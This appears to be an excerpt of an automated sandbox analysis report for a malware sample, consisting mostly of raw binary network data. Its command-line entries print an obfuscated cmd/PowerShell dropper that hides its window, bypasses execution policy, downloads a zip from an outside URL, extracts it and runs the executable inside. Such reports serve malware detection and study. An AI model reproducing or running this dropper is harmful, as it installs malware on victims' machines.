cmdline	cmd.exe /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
cmdline	pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 9, 2023, 9 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE filepath: cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 9, 2023, 9 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (50 out of 415 events)

Data received	1
Data received	-dk]®fÁJ£õÅ7Fë9¤»4³ÛÌux¸ò,/ÿ
Data received	æ
Data received
Data received
Data received
Data received
Data received	0
Data received	ÉÌÐz[Åb(sjLç8EÎl«Ñéìf}~ÀºÍfmªÂÍä¥O³,ç
Data received	p
Data received	ÍÆ{åhG=¼ÕËº@*#¤ÌT÷MJèX÷6áKZ´Âû¾uzç 0/g¾DÃÝ¿2BÕ¿2öÈW¥½E¬o,cÄ³ è(%25PÜ<ø \|ÒÄëfç BgµÒÏ¥Máteu³§tä(-É~~.Ã#w?RMÇª¥0Ñô -iÕÖÇÑ3mpyægz©Ìø<^\|l¢ëåÔ$IKf òr\|zÑº4 ¨$Bs¼NºªKÍhG½k>Ì71ï½ò@f@H¹,µã@¶à ²z/@ aU¡³$²0")V{òíVÎ¾K5[`¦ÒTzHÿMÝ?'ß²,ôw¿ÃyqÇU, 8ëï¾'þÂè¢O¬z#â·²^unXÐ×mT'Ñ]æsyÄèºþÀ¯b¸oôÏÑÜ
Data received
Data received	æ~P6/¨Æ¹?5Òßåär¥ßÓÙ
Data received	`
Data received	¾[ã& Ï'Ë·¼dé{Ï£´-òU Äv±Øÿ{Þ7
Data received	j.Ûw$\2ä«6¥aÍ²©c`l]{ëdé
Data received	¤üZ]Å)PA ©Jñ_pÉ½´¥'ø³M1¤tWG`$Òþ¬dÑ°Ï.UOqÞWSÖ¬~WÓ[Í(¼¹×½E½1é~v^kð1cw=â0³¹¶ê "y 8#êrÌpñiõð£12ð(¡ðf´_1'ro2éÜÖÂ4Á¯ÏTöR}eþD¾·-£<WÊZáãM©Åçw´EkzFT5þBqDpº±lZäeÅ£8¥4lr'fAÕ Âv¾oì/ØBXgæ«pþuÏú$ÄM0ÐÊ¤áG¼ÞyøMµz¹¨·Ûç®âTy8b¸7m{ªÁ ù~;ùzÚôè?´`ÖßÕÀLVÏæåÙb¸j(&KÊ/jöÌ16^Kiù×Abm_çÁûü-âÓ5Kû5²6Y½ #ìÏáÜË¹ õ¤ÌÎÕLHnc÷µDÔÒ¤Ýöm8¯Ù÷ò^ú£Â©µZý\|8%j#Àv½ølQ-ß¨CU¡^ô=½j5=Ö!k2ÜñöÝv \æEqAZë7®uðíwÒù®à:CFx{r©áS÷³ s©¿¥Bg!crá_gçì([~ZQ@ú¼Ñ"é8×V¸[ tµÿ«ÐéîUV@¹zpp»%Õtñ®ÊR4íáZÏ3VTä^ÉÈb(º MZÌÑª bé¿w×%nbH¯öãwjJ<ÀþÅ¯T;`ã "±ävü¼@=@ÿWQ²·èço6ÐÆæEcÀ\|]pML' ôi±¶Fw®öIwº<dØ÷u73¤ù®yÇ¤æÚ3©(¼4 ÆÜ4gWÕynôâûJHrGèâÜ¼i,'¶¾¦æxræ u²~ /Û¾DOl"ÊÉB4p+ë~QÓ÷Ú0ißÜ ûfIzáé2ÙÉ9iÁDRÁØ±áÊ¢ç_°±8U5)Hª3yuÃ º#ºâ<`Ó)3ÎÈ>é"~éX¦ +W$æ8z+ãsUQ½»ALÔÜ¯L ì¹a2[Âñ¶<¢EW[=³G£l4½EãtbÅÈs9VÐxÓ}óQ½¿¥ú·ªþDa;WÖjìå¾âBaä3}SYíE¥ÍFÕ úÊ1ù N»õ ¼Û¦ÜhQ¢µÜ%ñìpNe Ú¯Ê«%ôôG÷3]KÓç"z%êý¦U_lm{ºU¦(ìà!þ"ÛYtÜÚ´Z 3$:¼± ',÷äÏ;x¼µM4ÖM£å?U5@ôm¿J+ØÕ[ÔÐ~hnh§.àý`iÀC3b7þÅ\|øõ®}×2R¿wìøíWÉ¶üí LhÜÜ\|QþÙjÿóòõ¡HÕ÷¶¹`üM,=7d£"ðR46·°ËOPçª©áB¿Ó¾Ë[Ï§ö4dÙýÛkmÃy6Ú¹O+§pFY2ísZ>ùKmÙ»¶óñ)àjUï`\_³1äe9E®Ã{[\|o4¼ÈÌ×´l³E_ñT5&ÇAzt¢_ ¸#5ï©3jfkS³Õg®½g«tËY&¾ïÎ§yEøEO Æi2ÚÌ"z¬UiEgÏúXüàTÎb¢®¹^°P¼-ç>ÇðZCr[.¡$Ya×þ3~Òy·3=xPH@8DÐ§ÝQ¿Vã½èâÛØuTb¾?Å[ ÑÇáÇHíAÙX¨í Ðÿî¹õýb Üe#Ù!ïè pð£Â77µÍ7õÉ$0ßª+¬n-·6:zhv?Ð/xú¼ÅKLø«øqçj.¢cÒÒ@f¡ÞM¤ÂÙVð¾³,ÕZßMXB°1¡Ï)·)ú·\| ·#£[í\|ð,eC¤)»+lñû0CâÕd" ÞÐV#SØµ>r@ÕðcÛ°)ÎØGÚ#3=qèÜãÔ7R8ìÌðM!<¼¦ÈøÍ¬Óå£Ò¢ÕhçNÎàÌî²Ö}s ;âÚÊ-ØuÕN ú9oqë±míY¯oð^ÜwÉçÍt§\|Cøb±F\ÊÊôéûìß@ðJ9'¨ñF¾£I²>ñ§^@ÕµÂ]W.íg~0tWKüU>F¯»øtF·bûæîßÝBàßÍÅòñ bLZ o»:Ê¬·-5ÍÉöÑ!LÀøf¹àÌùéý£©aßU>6¬^Ý¥ïs©Åöý[£zQdQ÷ú×^#F{;bbZ®nÛ?CÛï¬û-Y\|d¸_'`G6Nù9ys~¹åË'ûØóòÔ!ëj0`U;WÌäRBÿ>¹ÈC&ü-M;ü±Øøg²}¦É¨ zæ+CiáÇúÄïx×:@Bcú"Ê ì½ +À¨Á<mF´fº^¥ßAvÐ¯«y:kV§&ze & c'?ðÿ;EqK(6âER_«×ìa¸\|ï·\ßø+øÊ;\QòmÁ4¦»\|üÒÅ71d1irùáJI'w1»£«ï!¶aºe[i³1ó3 /%ñ Ñ¼ÞÆ#CöÞUÈÝ\_Êåùº#7ÅûQ·"9/§!×¹¥ñy¼ævìc`Ü»¬uP¤Á?"Çÿ¼ÝØ¨
Data received	a¦ p¬§kAéü.ã8zqE7½üÇ>÷ 8#Þùð
Data received	:Î êáùàüzt0YÝu+¡Ö/O¤H1ºA¬Ô-e
Data received	XeÈÁÍv° g[®\|>{ûO%¾8÷£ÕÕ¡"Wßá@MÝLkÛmÃ-Íäg°§0²ðdQó¦H°>©ï(O?}ÔËÈ²N¡uPµk¼¸gÆ0= t7±²ºþW%(YLÒ,à§ÂÅ*5ª)ò×Ü¶3Pü2yS^fRX=e)ú9Ó.
Data received	Û øVÇÄ+H®6±m'ê°viB\|@xåË,(4 O
Data received	ö°rÚl Ò]vDç¶óÏøt5¿¢úÞ;!
Data received	Ùt\!Ã=Iõãë.ÃMB^ñÐ¢í¢RI×07Ý¥àu'A+tÙZãý«¦qì á?^ìÁ8§-½lZðu$7³ê_þuî?\|²_K^ë#Ù wUNV$f=x!ùÕmk7(Vò\.Þ®Ô2Ô)ðjÿ\ÍR©I®v"YojÜ¦©²Jy}-ÄYÑpªý.ÉÆaØ¾?ù&¶êÌ+Ìý4¡þÁÊaÌì¨o§6Ñ=ÄmI°óLÔÀ¸8Ê9éY¤a#S©ÀwiÄD[~þ§¨MJ/5`¾úå0£ÃP¯¾¾> r<Þ \` YÿEô ôHì³jÉ~VéC¡4ÀO.¼&:»Mðßo¸çH¬pñ6=%?ÛwQÐ±vX[ÅÝXÙ~ßÃ¤`/ªt=ÃÝ66$6¦N®°>^Â'kQÀúíúµýzUvK%/h`2"Lé7!/~'ç}Òz¹öï%yJm»e IF]^ÔïØw¤.¤~Ø6ñËU½yÝµwÛóp¤M<YÉß±m?n¨e¶}³ÀÓJ~á <¦¢öBcq3^Âmÿ²Ø×8¼@Íâ8HXðÖÝÍ Ózd·\¯øÉ®8Cú1ÁÀ2kF5Ê(Ü^\r:]cD¤ùûÚÒáüÇÀgé8°è' ¥§V«ÑX^¢5Æý§aÝ7K>´ OýXBKàåÿîTeøë¬-¿ÕVfÛêÑ®°1ý=¦3C·XòOGMðd×¢S°Ã5eòíÂÚjjFâõcðµ×õlAÅAã\Ïõí]6¡iñÎ2).Í _\G> "ZÂµ%ó ìk½f¾dÛFÖ×Ý£b_þYp`ÝûÚÝtÍ°¯ó;Ocüb¯8Ýa)DW á©OMnrdYr>úq9½}OOýö²K#UéÄ { fH×3 STýWÈò¹Ù¿^ÿÓÖ¥û 2u]r]nõÒ¹ÿÚt½×&×¹{£¢÷1 ¾Áª½£úÇè6FËà¨¬,õ"ú·ÒSm&LTÒìØh´ll8ÉûBt¯V¦ÃOIËÄÝëwyYÿLðéç¯îû FØUq¬ f[Ö§¢ ßÈsj¹«=ß"¥~Òr±-? ±Ï7þbbo¡éF° b;z Ñ¢ÞûÕOï) jv÷}lf3Å»n9Z\|tkkUYëÑ?ú¾Û àW17\|²øò±.,ð6ü\|]h%¤7DXgMse¤Ìsý6zÄÙ%¢ú¦øÃõ`\|4B´ùß¦J]n¤°d¥Êû!ÅxCF{©ë»ÞmÔgk¥#PÚÌÉÏÏã¥'wÎn GæÐáÄPßnT¬8xë)ld×Ê¤òl§
Data received	Á6NC^ý&Ê\|èL`ÔI³ñ\`j8±rËÕ=Û/ú
Data received	ýÞ$ SuÆÃÞyP³ìÐô\|*>DPé½Rx
Data received	cdaÅ¥I®û¦ìHC8Ï\}òðjÈóòøódbþB¤À«¬×k=B~B"uÝì@În3cg*y)óçåçVEÒ.T7 ï¨iùpU¢Zöð¯änÕuMÞt2WAV[oÌ6Ñ }ÍÇ3ô#ÖO3btç²t ðîOå{@ò·Î©©ò$eT?×RJøÖÊ'©ÂsÌ#´"8Óy[xQÑJ@O!4îyXÇZïÈ)"L`kyÛnÅîÍ"LB7Ãu¿ø#Æwmõ¹I¯Ô±¾óÜý§Z+/à=¦fBÂÌÌäëèUPìc¶fp,í»ºû×ê¬`gôÞ(¹oæ,¥ê[[©ËòÃf Û7Ë_o¶åÂÏ7©l)[¯òPÓ-ê 7_/¹!b=svðDÔ¡A&gS®ôpB4JáÈÑ\Bù+2"Ï_TJ#'# ÕÎKíª´
Data received	júÁÝÁ=Ëªüí§2rzi¦¤Ál(}×¯÷
Data received	JÐ2ÐçÏ@lñSì¶Uràñ¦Ï)y"±9&Y'
Data received	fÛÁMÒ\|áÎçx¸B§U]I6¦ÿsùbºv¤¹C}È6,+ëÐDµfñÉùEÎ7(ëßÔø6ïõßéøNç ëY®Ïñ:L{}&.^Ñ§3²5¼Òý A¾þo/ñÒË;çöþs]è)?à?º-÷ðeø!Ðá®íR)[ðU[ä»z F&p½%Êê byôÆU8hóm£2Ì~Äðô5ÑD(Ä¹¶×¶Kó<hÛóÿÊ¡Þ#S{Ivr¼üQøÞyc¶=ö2IpÐÉùÿºN·aÈªüà7×ßòÀa#iW®Nd®?àV:Ý Ó5~këtÁ ¢B1ÁDäWkÂ$¥Oíü¸Ä cDÃo¯ÌmßØñþóØ1?ù-F&M'f¼Ü.jçco$[÷«ÇYIÿçòÞê)ÆÉÌlná´ÍFÑrÚtô`V(a)ª7Gi8)8%@ 8G¸ã%g¤u<¡Bë¾Q§ëbNVrÎê¹à}zW6ãXÂBõMsdIüG¯îÜDL±Y°èËeoIÏTWó6Å¶ç~aõ:¢q^Í9ß@æJ+Y:ÑàdWn\|¯6[öÏhÔäÊ½z7;%.!&«VØ+õîLôH9ÜÖ¢l¼EA,K]V¢©ßþ§b¡´ÂÎß_7ß¸wLÐã©¥ÿÕÔ~¶0;ÎüërÁ#jÙ!±;ÁgÆsûôâ%ÛÑ^È)ó³9H½LÞOõo×G5-ÍeSa]àAÈ#ëÖ9[oá¤³ùñíg ¹²IB¶yïÄp úkÖº1 }öÏEÿaVø±)ÈMÞRðg2'hHëÁ5pt¨,¨Þ«Ææ£c§R dxÂýèè`¯å:ÌÙD}d¸¶.5V¨ìsÑø\étÁZ(¯k©?`Ê9Òµ#_©¡÷ÖpI;&ÑðÍ2Í0þh¾*ÄcÈøûíÔ~4¿?kO~ÒÜßàhi°ß»ëûQ¢Cºµ>hÿn.âl§óÊ,ö³û+·D®¿/!ÎM'céN±>ÅKû¼¼,5mÑQ÷¸9Új[7&ÒsöcCjC xV-¾ïÒÆ»Ï,æF!Ög+WÀ»íñÜ #3ÈÊ®³ï¢GÏØ§¦%yäc{Ïý+ÉBïÁüû1èÌÆX9÷ÂåÝ`ÜEÊqâdêÒ(¤> ØV}ÚÙãOÔÜU§zÊ«\,ßL5NxÒVoÛÇq,ÄH³' âCj['«L:`r®oÔ÷Wþ/¦Q
Data received	w8mgüÑËn«Éék\|Kö4¤<ßI±Þ¤
Data received	¾YÂêSpX#*hÛ;hMö\|q Ú:> Ç2
Data received	ãÍîRd£ w°ºn'FÚíäow²î+_)£/F
Data received	q\gçÝMÀt¢Çj;-}zõ¤Uxý_ý¹
Data received	`_}uÿVã§ VØUXKqÛJâ]«óßÏÈÑû{ñä¾-5æD_ÁðM¹éS£S¾!zÒzKwëÃ^¤©hO{ÄÇKêÝÑÀ/Ç?Zu©oý©ø@wÆ×"huÁ öËaóu¤×âö«Ë©R8 gZ1ïx¨^¿]ö%ÅguzgÃÃ« úðmOÂ4NkÝC.ýl}ÊaÀ¾>ñ@ZÛÜ)[âBnÉZ°£oÚÑxKó9;ùÔæùGuðp@¾xíö±¾#Þù~ºó¢¥Á9Áë]ú=ãÕ°®h4þCÍq<è@Qºz¨a£Ñ¢ÜÍ`{¸»¯õþH«® {9¯EJqhD8öàñëô'ïÙJu®¡²©TþÐS ¶âç¯ÍÊ ÇÙçðr¯%Uwy¿óX Oã>P³Dp¡¥3\É:XòÓÇGãÊPýÛ8G³nßÄA`§^"Ôd±úÖwE;!¨ç¤ËÉÆQnÆa0TªmÈõkôÄt/ë7Þá%Bp3!ÃÓ£W¿ ³OjzC;PÊKI#î~Ï}2S^»éÝ6÷Iv©ìi¦$À¥+Û8wUYaÌÖ9s10#: %yö4þNvFC»ïÅºødL {<rþ1èÑâÇõ×¢38Ï0(@7JçwZ-v¾É9¬E£Ý2eðG°>¯ót²÷Wóö%3ìÙiæÊLÊñoKYÄ!(ÛIo¥¢e~-+ô½³N¯(ábxÿuÒÀ³ä¯CHÀÔùÍì(èS?:7Ë LHN}WF¸ì¬Xl¯ö9¸ô''¢?Ü8C3hÙidiÂ¢ï¿õ««igm\|M~y%%fI¡ ¬¯q^n½ôº¹»È°½«¿íÍæÔ%v)0*É)ø£÷Ö®T2#¤¡ ÇAÐïa¹(´ü?9,6ñ¨kk&oX´óô¼ÞjöÔ!±Qz§Oê0T^Ðâ£»§zG³i<Û@W§½Ö#TË¥ÁË ÷
Data received	<ój6;:=ö/ÙÆQ}¿ô PfÛ½)Óí%RÂ-ïµý~²wLÃä¬Þ÷b":JFËaÞßÈ &"7¶q)ÌÛcáaº©ù¨¶1ãòÃQdg¬mk«xàêHL6²ªAãRñ¬Ûm&ô4Ëµ-%'ºÇPAva^}Y6&iß]]H÷zq°¥ Øð±§¨¤æhþi ØÄÙðióN '\|¾¿Ô{½.ç¯wiqåÐ?+êWÍÎ~¸YâÇJÃfÂÒ_=éÿ¨N{ØÀë ¸ïñëü-µw(x¹WYCbçåsÏ,ì+ð.³^ÂìÒ½C)Ú¥.OÊ[<È§áTvºøÀ¶.¶2 ~Ëg5¢~k !+¸»Ü® Yót¹¡N·óÅ&Ð{YÌ©áÁæÛtYC-ßøpÄr~¬ËúµÏ~ % Þ¤PT`~#"¹ÓÐyâ2FuªÃ.Õa (úu;·í¤i1tÝÈ´^7£ùt\| @!Ü¬º.É4AÝ³Cù=m<ÌÑgKå¨J0xk5¼ïtô [/ý`¶ÏÙ?½ÍýPÉ¯\|xÙ§=Ç§hØ£YÞõ[¹íà!ä~ò¯ÛÐÄös5÷_¨àÙ½[¿ç¯´µÑ»ÃP¡pïÔeùÇBbk³U>R+ì,2aüF#H-_5$~' ¤ZFÿüÊLýgt½ä_¦nÙ.2w¾Ôè(.$¢ÅA+±ø>»÷s¶ö¯\½ß?;Jisù\|+ÁRòÁý p<I¶¸}ØDÛ/@åA>µâXS1ØÀ¶ÖØ·Ìø}ÕVcDË([Åe/é£@$HÕpòÞwEÃªç2/+Î£ª0!BóT@D/1J=cUþr;ÆPÐÄa K¤Ûê6[1²ÂlwoóÞ ]v#ût(,H)ÀæÌÜÿFi´äûÖqÅuãi@yÚA¯SôÓ!AHøcÑ ÕoÊD8^s\+`ÀmUAÀèçCáøËü_ìå÷¤Ð?zìéÕåt¤'}i°JÖ6Û%ÙGðÐ"cGÞDcâÔúÙ}¿8Ã$zË&¡_Jaz8SU`Yèç´®¥¬y6ö½ûÃîÓ¦èYÒSõÑüTWÃßT»zqÚföÎW^fòäØí3 VUÔô#øj\|TN÷i_®Q\|À¢D,DÄ¡mÎGLUHÔwUh,Õ<o¾BÂO!}ô×}+k7½MkJ0ù£!ÿ ¬{xXéó[Xg^åNHÈ³ô(Ã5i)×Bñ É4@æê×eÃ_MÈ="GT6r0<V[¾wFjXµÙì©,ç½¤+þi95àÒÊq&;6ÇÿÞ>¦Bólt~:À\|ÍÌÜ<GÞåÜDeXök2\|ãÉä¥ nG)¨ÍÖLjb®DùÑïÓzÆ;°, ®Âït²é}®gVKEmyÌÉuÆMªúDdòf¼²EjñêY¥¼i3¬6£Joµ£VrÎ<®k$üÌSKtø 5rªË^Ñv§®¾Î¢ÕTµË=¨IhÃ{~ó¹F¿ªZÊ¶ù´8n¢t èèv<I¡Ùï©¡[>qNÑ)m¦d°cQâ5½RæO[ÃOü÷\|m[øôqÆør'UìbQÐåü5¾vdý.ÒW««5 úC=MçÐÛè{ï¾£»eÄó=8{Õ-rem[ìú¨y2)>èjië,B.yð1ÍÁBÿº]ìLDNÈÊãÈ`fÚ½Ý !ám§ôäJ÷Aê±?0!mzHÛ²cÉ©_ubØ¯õÔÝ\|Q=¾W;W¬\¬INðÌ(E4Üs`¶7¾æÄÐ gÓö0ÝûºHi¶CyÐ®ÜóoeF)ôVî¬»ü¢TËîáÛøæ~r.ö=?^:w {â.¨¿Zã%×yèm?þ8În'EnÐ /+=Áwq¢ðyí(ußZQä¶SÛ³×ÎlÝ[âww6LFoìMñYáóXËA¼a@·\©=8cM\}¹ªñ?kÉYfA^ÿ7+÷C8ãÇÉA7JòíÃíý¼ ¸áJöäc²L½9&4½äª8d¶vÌP"Cû¬4ÅGà,ÝAÔadz®·Iky;×ñMÅ{BzàÅ<î®§Ô¶ò±ñÛÄç=²T\Ì[ÒenÞ~¨òþóà=09é×¾Læ¯oË@ìRð<À·¿ë«ú¦ÿ©ÁÑö»»`¶·LBÚvê4l(BÆC¯¦¯üy¦ä`ô6ÁYú¥¶?7ûõsL¦®©ÈicöñÅÌoøÅÃ6èV>éÇätçwClÌ(#:,Ð0dXí7.=ü£·Û2ÛÕ¯{·2ÿô#6ïâvÔFÎQÌ53-`±©ÝA;.\|ägê³¸1k¸.dáô¯¼ûçDJPýRR á ýàû3ûÒXÒÎÃ3¢ýv¬á¸òü¹5l 8ëJxß¢N«öáJz/äB¢¯àJÞ;s%ÉäçÇá¸$Cªg iXÃÔ-L²G.z&_>L:ü}¡W÷Øµx!»ìRV6ø¨{Å¨%!H÷obW[R &èÓZ¼?ó»fçqÅ{ä¥©è]ÞßêÀË«à@2õ½UiðÃ©®k(¡´ÆzAQñ5Kc0 cÛ®§§îEÚîß#5u®¡wx0sõ§Q8rx(t¯ xÐ/¨§Z èÑ=Ü÷M -ÅÖ3ÿî\zñ(I2ÐÃÐÖ¸ Vô#è¿_÷ÛÐÈ!]ëNyÐ¤°Dôï»8ïõ¡vÌ 8ó¹]Ù¤ÿ4CfÏÜÂßehàSý'$åjO]Ïæ@k 6øÿ#d{r¼}+¹i¼xæð Â+_î«óÍ}á\PÃ¢ us`«¶ÝKµØAã¹ç\läªWR{×úý ÀòK,úGé`µ¶£ã,fjt\|vàJ()Ëj_huÜÈÌ¯1v¤{ôñR/ÿù¤mÓûÒ¢!n±ç±fÝÜ Q"äw?glÛháhþ"#bAò¡ÐËÀêÄ2{à=#g}KÔÓË¼BFtëèv¾ÿhIXñoHQóß¸ÜàÔ#´.ï"ÝÉö^g±;Ü(ü¾òãAÄíg+ßæt~ÊÄ-î-y{:V ãM¡ÕÍýE#2P{kËëOSü )OºÜß«XçNlÊN(~ÐcwGc¡Çý1Üb¸{i±FBÓAwT©ó«\óÑC3ÀËO[aýùï[5Ô1ùD`Ð×9<\oIÒá¶ÈÐ±Û-?hË+Ñ\¼ðñyF9gÝÑêXâtîÔ/^«&kjnç¼Añw¿48ÁË XÙ¹å( ì·,w^L+ëð&ÔdJÑxOsÛÃÓTöævzåtcO_&`_íäß]3é\Òv'VÇ@ã!^Ö.E7lÒ]zÎI§Þ6¶Ág%ä,~×J$áèR¥qÓ×ãñ´ #ø¿óî!RYt 5U±n!RÚËFÎ±í¡v¤ÎTN ¶Æ°º1yÙ`l;å½ÀûGy¬{]ùZ0dü°ÁßaÊÿzÓn:DMþnÙòäµÐ{-º;÷wêûð!úÈBRKXOSC25*þT]Ê9¾ê3vvM+ú³Bo)Lãhü¿ÊÛ¼±e5=©æk)ÁîÂ]ø1.rr-)Î.ÏÙ°c S\EùÎÙ/L²3´.´¸wZÏïÂRi4:£Ý´Ç»ï\|àËd ¸Vò¹Á&ÉòÏXEPã¹ÁþíªøwG¯è3äjdðmÛcÏîé÷§±³W4}»·= q ÁMZW²<LæÊdùtlfØÔ»÷"e¢ßøÛ1òÞ"×FâåÖHXëûò7ÇèùÇ}h¹Å8UËL6i¢îAµ [¬SÖdRQP8jaÐnµdïÚd@-\|¢é»tlfÊfi
Data received	¤Â·iðÈµ L<tíßÛaMq¬îbÆ ¤UÆ¹VÒÛò6VöÒ§JªNëÜ«XÌó]0YKF¸µºæ6¦}W¸Q Ì"ûí'KuR¨ð¤5¬Ã±{Õà\|¼<ù\`ã^yaÀèÆõ>uùILWÄh-°¦ÆH²Çåa`ÈBøçpn8I¢f% Í§Îg8ïý q¹Iû<ieÕ/Óþµ÷gæSKÓl¤¢£¡òá©K`rH#ãbré¶g-W`Ìçp/¢þýK´â´ôZWR¤ÉCvMëu±yO`k¸ ©y(-YP1¡¥ï£NÀ1Öù>}<X Í!.A¶âhªOÈÝs,6áTxíSWðV?+×dUL8½Ò·zIÆåÑ7¬ôw»+¶\K³É4d6§ìû±Ðj25cÁäô²<úõÌn7Â¤Vºizø àm EúÃQRlTL1N8£³LM/Ù ÕÐ§åÆ²óNûÎÜ[E=©AqC«&'Í2\|=fÍÖwqIô½.Bói¯¨&®yÓè¸öÎ·Ò´ÜåÐ73ErtXa<îý æÒxÕ`ì0Ni5âpg<ÞõQ£°ýV:kJrÒ¬ãöÉÜö2´ßù'ODÔx"õÜF´üJæ,TÒ\îõÚÔ àÎ4ôC6ýû<4»IÆZ¾òùTÑyFp÷Ãk²{»»ØþrÁ-Ñì¬þÁM E}&hæ:øñncÛË<Öë{%Õ2äÆgá%¿§8ì:RAD)Kn®ÔãÍíâ¢ý£KèPTý«,&[Ãù áC®E -ðb½³è}(ôì? üJ,> 7x\dõZ½þÐ?gÆÌ6kS%lïô¥6 Q&F= æcvHðnQj2a×;«{8wa²³ ^@ZaKçÉçaÀ¤â<c§¸nÂ,ªZÔw¢¢åå@¾«ÒÔ°X³eDIÑ)oÙ½ÁÌÑwÕÔóötK3½4Gæ½)5Ù'79cNe:7ã1tfM1øÀ3W`¥\|AjcàOp[ÒQÀE´î6¾ÖÕrG/Ê=WùÝúw6B>þIû9Oz0u,FÄÂ#ü«ö§E#1iih`± !"$+ þV©.lÉ<W +Õ´Ç,³\'¿Àî<ÇûÊ7¿tNEÑ aR¢f Õ)BZ5,Y!ç v¾oÈÂü©sÏ¨©LXn-¶Hvõ´¸òj ªÜ?üí`°âRêr ª®QbHjýb£¼æÌ`{þcWÍ8¡ØüÂÓÊZFaD>Á,µº¹ @2pö>zÆ@!,¥PZq´58ä<L¨§Q7-;;òm¬:Ùá´ðÖVhsÛkP¨ÊV¦ßüE©RN j+VCöóðÆOï jm}Ø5¯L¹¡M/ñ£¶e{ÂYð$Ã/záC"~zIH×f)´ a, Æ$O³Ø&ÖÆnCíe·,3}Wx:©Löå"s«´©$5ù¥f²æKå-_jhÕógô¾_ñ¦»RíòÎqùòÈëÅøzYþVt ²¤Ë`¶L¥ NH@Q÷S-îvZÛ÷k$Á`µ¦/ÇÕ¦î=º Òä¹5³/t»£]#r Õ&ÊÇ!ÒÙúDÉ~=²TíB¢3·ß5[ ;AFÐu¡Jÿ8X´§-#D=>ÒÀ~Ä¨mù¢ ¼{ç«²úÔ² ¶ût§þåÚ¢åm·©oñcWh×¼dhëuW0Å%ÈÅ×öè_xù=Âá ðÁÚgÃ÷åÂXXì¥¶¢=i;C¢pÏñ¥ß"DÛÑ«c»óµòëyþWÌÐjatü\7X¿8èÎð£_Z÷ìAÕ~°¦K&Ä !TÀõû@%×ÄêÃ!oiÚØ j0µxÎ)Éårô5Ä;ShoÙgbì»«Þþ=÷'ô e ksLh¹?ñ `,24òÑ{õE¸EMßÃ1Fph®@ñHu³fý¸ìÏØ±c§û1«fí 790<C-÷Ýl$krþd¬¯vjòüô±:y9BÝ 7o\%»7Ó©Çº #Û>M´GlYÜAa;=qjÇ¿g±cæ&xª3E¦ûÛt(øÑqUYáÔ(ÖMl´îMè± Ýgv¹Jyi°@xïÀÈkãÙ"Õ,¡ª_íeL§¿X±Õ !lèöIØn:Õßïx\|Í`3ê%¼$g`±¶¹7Cë° ËFâ+£qýÐ 0ÜÄûÈDü$:·xÂXiæFéêM8þ#Pêho6M=V²ÙªÕÇªWB^FgV¼I@§Ý Ì=b¿/düaõÜ¯ÐUB<å\|y½t65ÀìXccáô¿Áø¡-^W÷.yÐì)Î·fñjKðÅ£ +¢s¡ÓBÿ.I½P-qÂ³¼ '§^óáj\ï½Í'Ù(}C[ÇT¦N)®M-ü³&@Iýæã´É}>÷<þî«ÌT_äU^wd Ð«Õr\|øÓhá_.EÀöë²Rá#d¨ªf³$^\|ãì¸ÐÿKIÄ¡ È^×öBü+uöãe©ùÓ°ö6ÊÑ^woÉÁ:?Ifû99Ñÿâ=y8>c¼ºÝü«¨°ÍÇfµc¬ ºÇQ»iØ¤XndMþ>ýÒs¶zMBxR; -amRÿ=Ú_áczHO\|e.ÛìK ËbkHvÂó·]è¿Þ±âùçjûíÎSÐ}¿±Ò:ë´I¾¯Keô#tw_ÜzÃÜÛyÊ èk)ÝMgWN^özìðÆ¢E_{f¹)Í«Ö4ìïÂß}ÄÜ[áI:Ý«;¹ìø7Ü³qû&Ý#5¥ÌÖ\|¸°³TÆ@Ë^N UåÄùîÕ¸yN·ãw_&¥1"nìïEÛÝDQR [ZÆÈÅýõ( ìÄãÊegúÙRY¬V¬ço1o²¢Ôøyu,ä<ùr'p9TTúûCwÚ9zAFJ· ¦¥¦¾Õ,ìF¦²Ä_ Bmì>)rï÷"¤Þ&÷J5X@¸1áØÈQf®Å5Ö¹DÛ?ú9oä\töJU(µýÎ))¤T@ýÄXp1}s[Gs/Câ]w§Jð3æK¡Åy^{¯ùî&uÅ·èì¿oÄf<w¶ñi ö`xÍø)_M?MP¶)W{þûKNªÑHÎÆpd³_hË)1ñè!2Â6ÃÆw'PêÿÆË¥?ðÅ÷ ³-M®ÊøR»îÍÿ"×¶]2ÖV¶» «$xÚìLÒ&;á¤p4<óA'¡ñe ÉÐÌ¶¤WeõWì©ãú[²~ 3HßØRI ÎÓÌP§FÆçì!oªä¨ & 9uãçÈyÏÈïceÖÑÓ-Cëª¼§/ù!4iyUÚóRÒü/ÊIN¨ëJ¡÷ylÌ×þäàWÚ.Ã+U\8$s\2à]¶ÍîRyFì¸ng&>Ä.·à=Ñ¨/aB9 â£NT{ô3>wÃò¡)'`!1ÌDYh×ªH®½Å¯t¡b#ºt YK6©ò¿D'Âb÷7qµ ((ìEM5ã°öÝ¤ýÞï³@ÕÚÄtª¢{R¥¹ÞãÄº&þîÍ1ÊåT÷HÉ(~Z½ ²Z>°ë7ZÄáÇ"Ï±Åkíá>åÜ»fîVû©Ëÿä*ÙF"©ûloô\|ùiÚ°º+%#å«ûQÑ¦kàïRMÅéLÄÊAÊ_ñ(wºjx ô´ãGì=o¸MQî%Â/qÄ«· 